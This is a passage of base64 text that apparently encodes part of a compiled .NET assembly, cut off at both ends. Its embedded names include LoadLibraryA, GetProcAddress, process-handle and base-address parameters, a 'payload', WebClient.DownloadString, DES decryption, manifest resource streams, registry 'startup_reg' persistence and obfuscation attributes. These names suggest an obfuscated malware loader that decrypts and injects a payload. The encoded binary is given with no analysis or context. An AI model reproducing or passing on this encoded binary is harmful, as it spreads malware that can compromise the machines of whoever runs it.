+NgAACnL7AQBwHChKAAAGF283AAAKDRk4mP3//wlvOAAACnJXAgBwHChKAAAGKAIAACstEglyYQIAcB0oSgAABghvOgAACglvOwAACho4Yv3//wcoPAAACigWAAAGGzhR/f//OAgEAAAEcmsCAHAdKEoAAAYWKCgAAAo65gMAAB8aKCkAAAoTBhw4Jv3//xEGcz0AAApyCQEAcB0oSgAABm8+AAAKKAMAACs6ogMAACgqAAAKEwQdOPj8//8SBP4WFQAAAW8RAAAKcm8CAHAaKEoAAAYoMgAAChMHHjjT/P//EQZyeQIAcBwoSgAABhEHKD8AAAoTCB8JOLb8//9zLgAACnMvAAAKEwkRCRdvMAAAChEJcn0CAHAeKEoAAAZvMQAAChEJcvECAHAXKEoAAAYRCCgyAAAKbzMAAAolEQlvNAAACm81AAAKJh8KOGL8//8UEwpyYwMAcBYoSgAABnJ/AwBwKEAAAAooDQAAChMK3holKEEAAAoTCxYrARYsAisIKEIAAAoXK/TeABEKOb0CAAAUEwwfCzgW/P//EQoUcoEDAHAeKEoAAAYXjQYAAAElFnKfAwBwGihKAAAGohQUFChDAAAKKEQAAApyrwMAcBYoSgAABhEIKEUAAAooKgAACowVAAABKEYAAAoTDRENKEcAAAoTDhEOKEgAAAo6HAIAABEKFHLLAwBwHChKAAAGF40GAAABJRYRDqIlEw8UFBeNCAAAASUWF5wlExAoQwAAChEQFpEsHxEPFpooDQAACtAdAAABKBAAAAooSQAACnQdAAABEw4oDQAAChMMFisBFkUGAAAABQAAADEAAACCAAAA3gAAACgBAABXAQAAOHwBAAARDBRy6QMAcBooSgAABheNBgAAASUWcgMEAHAeKEoAAAaiFBQoSgAAChcrshEMFHIfBABwFyhKAAAGF40GAAABJRYfJSgpAAAKcjUEAHAYKEoAAAZyWQQAcB4oSgAABnJjBABwHShKAAAGKEsAAAqiFBQoSgAAChg4Yf///xEMFHKBBABwGChKAAAGF40GAAABJRZylQQAcBooSgAABhEMFHIwBQBwGShKAAAGFo0GAAABFBQUKEMAAAooDQAAChEIKEwAAAooRgAACqIUFChKAAAKGTgF////EQwUckYFAHAWKEoAAAYXjQYAAAElFhEMFHJoBQBwGChKAAA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AAAAEAAAAAAAAAAAAAAAsA9UAAAAAAAQAAAAAAAAAAAAAACwDOwcAAAAABAAAAAAAAAAAAAAALAPKAgAAAAAAAAAAAgAAAHQAAAAKAAQACwAEAAwACQANAAkADgAJAA8ACQAQAAkAEQAJABIACQATAAkAFAAJABUACQAWAAkAFwAJAAAAEAAWANMAAAAAACsA0wAAABAANwDTAAAAAAA5ANMAWwCeAnMAngJbAKICKgCoAioArQIqALICKgC3AioAvAIqAMECKgDGAioAywIqANACKgDVAqMA2gIlANoCJQAMAwAAAAAASUVudW1lcmFibGVgMQBDb250ZXh0VmFsdWVgMQBUaHJlYWRTYWZlT2JqZWN0UHJvdmlkZXJgMQBrZXJuZWwzMgBNaWNyb3NvZnQuV2luMzIAVG9VSW50MzIAVG9JbnQzMgBUb0ludDE2AGdldF9VVEY4ADk2MTkzMmY3YmM0YzQ5MjlhOTgzMGQwMjE3NzZhYmQ4ADxNb2R1bGU+AExvYWRMaWJyYXJ5QQBCAEMARABFAEYAVkFJAFN5c3RlbS5JTwBRQlh0WABQcm9qZWN0RGF0YQBtc2NvcmxpYgBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMAUHJvY2Vzc0lkAEdldFByb2Nlc3NCeUlkAGJ5dGVzUmVhZAB0aHJlYWQATG9hZABwYXlsb2FkAFN5bmNocm9uaXplZABOZXdHdWlkAFJlcGxhY2UAQ3JlYXRlSW5zdGFuY2UAZ2V0X0dldEluc3RhbmNlAEFuZGUAR2V0SGFzaENvZGUAQ3J5cHRvU3RyZWFtTW9kZQBDb21wcmVzc2lvbk1vZGUARW5kSW52b2tlAEJlZ2luSW52b2tlAEVudW1lcmFibGUAVGhyZWFkSGFuZGxlAFJ1bnRpbWVUeXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAFByb2Nlc3NIYW5kbGUAaGFuZGxlAEZpbGUAc2V0X1dpbmRvd1N0eWxlAFByb2Nlc3NXaW5kb3dTdHlsZQBnZXRfTmFtZQBzZXRfRmlsZU5hbWUAYXBwbGljYXRpb25OYW1lAEdldERpcmVjdG9yeU5hbWUASG9tZQBjb21tYW5kTGluZQBDb21iaW5lAENoYW5nZVR5cGUAVmFsdWVUeXBlAFNlY3VyaXR5UHJvdG9jb2xUeXBlAEdldFR5cGUAdHlwZQBTeXN0ZW0uQ29yZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQBBcHBsaWNhdGlvbkJhc2UAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UAQ2xvc2UAU3RyUmV2ZXJzZQBNdWx0aWNhc3REZWxlZ2F0ZQBEZWxlZ2F0ZUFzeW5jU3RhdGUARWRpdG9yQnJvd3NhYmxlU3RhdGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dlck5vblVzZXJDb2RlQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUARWRpdG9yQnJvd3NhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBTdGFuZGFyZE1vZHVsZUF0dHJpYnV0ZQBIaWRlTW9kdWxlTmFtZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUARGVidWdnZXJIaWRkZW5BdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBPYmZ1c2NhdGlvbkF0dHJpYnV0ZQBNeUdyb3VwQ29sbGVjdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAFlhbm9BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAEJ5dGUAZ2V0X1ZhbHVlAHNldF9WYWx1ZQBHZXRPYmplY3RWYWx1ZQBTZXRWYWx1ZQBhZGRfUmVzb3VyY2VSZXNvbHZlAGdldF9TaXplAGJ1ZmZlclNpemUAU2l6ZU9mAHN0YXJ0dXBfcmVnAE5ld0xhdGVCaW5kaW5nAHNldF9FbmNvZGluZwBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAEZyb21CYXNlNjRTdHJpbmcARG93bmxvYWRTdHJpbmcAQ29tcGFyZVN0cmluZwBUb1N0cmluZwBSZWZyZXNoAEdldEZ1bGxQYXRoAEdldEZvbGRlclBhdGgAbGVuZ3RoAEFzeW5jQ2FsbGJhY2sARGVsZWdhdGVDYWxsYmFjawBNYXJzaGFsAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFsAFN5c3RlbS5Db21wb25lbnRNb2RlbABMYXRlQ2FsbABGaWJlci5kbGwAS2lsbABzZXRfU2VjdXJpdHlQcm90b2NvbABHZXRNYW5pZmVzdFJlc291cmNlU3RyZWFtAERlZmxhdGVTdHJlYW0AQ3J5cHRvU3RyZWFtAE1lbW9yeVN0cmVhbQBTeXN0ZW0AU3ltbWV0cmljQWxnb3JpdGhtAFJhbmRvbQBJQ3J5cHRvVHJhbnNmb3JtAEJvb2xlYW4AYnl0ZXNXcml0dGVuAEFwcERvbWFpbgBnZXRfQ3VycmVudERvbWFpbgBHZXRGaWxlTmFtZVdpdGhvdXRFeHRlbnNpb24AVmVyc2lvbgBTeXN0ZW0uSU8uQ29tcHJlc3Npb24AZ2V0X0FwcGxpY2F0aW9uAE15QXBwbGljYXRpb24AcHJvY2Vzc0luZm9ybWF0aW9uAFN5c3RlbS5Db25maWd1cmF0aW9uAFN5c3RlbS5HbG9iYWxpemF0aW9uAEludGVyYWN0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAEV4Y2VwdGlvbgBJbnRlcm4AQ29weVRvAEZpbGVJbmZvAEN1bHR1cmVJbmZvAEZpbGVTeXN0ZW1JbmZvAHN0YXJ0dXBJbmZvAHNldF9TdGFydEluZm8AUHJvY2Vzc1N0YXJ0SW5mbwBEaXJlY3RvcnlJbmZvAFplcm8Ac3RhcnR1cABTeXN0ZW0uTGlucQBGaWJlcgBERVNDcnlwdG9TZXJ2aWNlUHJvdmlkZXIAU3BlY2lhbEZvbGRlcgBCdWZmZXIAYnVmZmVyAGdldF9SZXNvdXJjZU1hbmFnZXIAU2VydmljZVBvaW50TWFuYWdlcgBSZXNvbHZlRXZlbnRIYW5kbGVyAGdldF9Vc2VyAEN1cnJlbnRVc2VyAFRvR2VuZXJpY1BhcmFtZXRlcgBHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcgBCaXRDb252ZXJ0ZXIAZ2V0X0NvbXB1dGVyAE15Q29tcHV0ZXIAQ2xlYXJQcm9qZWN0RXJyb3IAU2V0UHJvamVjdEVycm9yAEFjdGl2YXRvcgAuY3RvcgAuY2N0b3IAQ3JlYXRlRGVjcnlwdG9yAEludFB0cgBTeXN0ZW0uRGlhZ25vc3RpY3MATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkRldmljZXMAZ2V0X1dlYlNlcnZpY2VzAE15V2ViU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkFwcGxpY2F0aW9uU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJlc291cmNlcwBGaWJlci5NeS5SZXNvdXJjZXMARGVidWdnaW5nTW9kZXMAaW5oZXJpdEhhbmRsZXMAR2V0RmlsZXMAR2V0TWFuaWZlc3RSZXNvdXJjZU5hbWVzAEdldFZhbHVlTmFtZXMAdGhyZWFkQXR0cmlidXRlcwBwcm9jZXNzQXR0cmlidXRlcwBHZXRCeXRlcwBjcmVhdGlvbkZsYWdzAFN0cmluZ3MAZ2V0X1NldHRpbmdzAE15U2V0dGluZ3MAUmVzb2x2ZUV2ZW50QXJncwBSZWZlcmVuY2VFcXVhbHMAVG9vbHMAQ29udGFpbnMAQ29udmVyc2lvbnMAUnVudGltZUhlbHBlcnMAT3BlcmF0b3JzAGhQcm9jZXNzAHByb2Nlc3MAR2V0UHJvY0FkZHJlc3MAYmFzZUFkZHJlc3MAYWRkcmVzcwBzZXRfQXJndW1lbnRzAEV4aXN0cwBDb25jYXQARm9ybWF0AENyZWF0ZU9iamVjdABSZWxlYXNlQ29tT2JqZWN0AE15UHJvamVjdABwcm90ZWN0AExhdGVHZXQAU3lzdGVtLk5ldABMYXRlU2V0AGdldF9EZWZhdWx0AElBc3luY1Jlc3VsdABEZWxlZ2F0ZUFzeW5jUmVzdWx0AFdlYkNsaWVudABFbnZpcm9ubWVudABlbnZpcm9ubWVudABTdGFydABDb252ZXJ0AE5leHQAU3lzdGVtLlRleHQAY29udGV4dABGaWJlci5NeQBUb0FycmF5AFRvQ2hhckFycmF5AE9wZW5TdWJLZXkAUmVnaXN0cnlLZXkAU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeQBnZXRfQXNzZW1ibHkAZ2V0X1JlcXVlc3RpbmdBc3NlbWJseQBHZXRFeGVjdXRpbmdBc3NlbWJseQBBbnkAQmxvY2tDb3B5AGN1cnJlbnREaXJlY3RvcnkAUmVnaXN0cnkAb3BfRXF1YWxpdHkARW1wdHkATXlTZXR0aW5nc1Byb3BlcnR5AAAf87L1n/ea+Z/7jv